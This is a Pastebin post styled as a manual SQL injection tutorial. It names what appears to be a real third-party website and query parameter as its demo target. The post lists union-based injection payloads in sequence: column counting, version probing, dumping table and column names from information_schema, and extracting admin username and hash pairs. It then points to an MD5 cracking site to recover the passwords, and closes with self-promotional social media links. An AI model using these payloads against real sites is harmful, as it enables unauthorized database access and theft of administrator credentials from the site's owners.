Advertisement
Professional-hacker

SQL injection Manual Tutorial

Apr 26th, 2017
1,892
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.67 KB | None | 0 0
  1. ##################################################JokerSecurity########################################################
  2. # Title : SQL injection Manual Tutorial
  3. # Tested on: [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/c/Professionalhacker25
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link video :https://www.youtube.com/watch?v=gkBFqjWbvR0
  7. ######################
  8. # [+] DESCRIPTION :
  9. ######################
  10. # Demo :
  11. ========
  12. http://vikimobile.com/top-brands?bid=5
  13. ############
  14. # commands :
  15. ###########
  16. order by 100 -- -
  17. ============
  18. union select 1,2,3+--+
  19. =============
  20. version()
  21. ============================================
  22. group_concat(table_name)
  23. ------
  24. +from+information_schema.tables+where+table_schema=database()+--+
  25. ============================================
  26. http://www.waraxe.us/sql-char-encoder.html
  27. =================================================
  28. group_concat(column_name)
  29. +from+information_schema.columns+where+table_name=*****+--+
  30. ===============================================
  31. group_concat(***,0x3a,***)
  32. +from+admin+--+
  33. ===================================
  34. #####################################
  35. https://hashkiller.co.uk/md5-decrypter.aspx
  36. #####################################
  37.  
  38. subscribe for my channel and page in facebook
  39.  
  40. # My Blogger : http://kader-information.blogspot.com/
  41.  
  42. # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
  43. # Page FacebOok 2 : http://facebook.com/kali.linux.pentesting.tutorials
  44. # Page FacebOok 3 : https://www.facebook.com/Professional.hacker.25
  45.  
  46. By <3
  47. ##################################################JokerSecurity########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement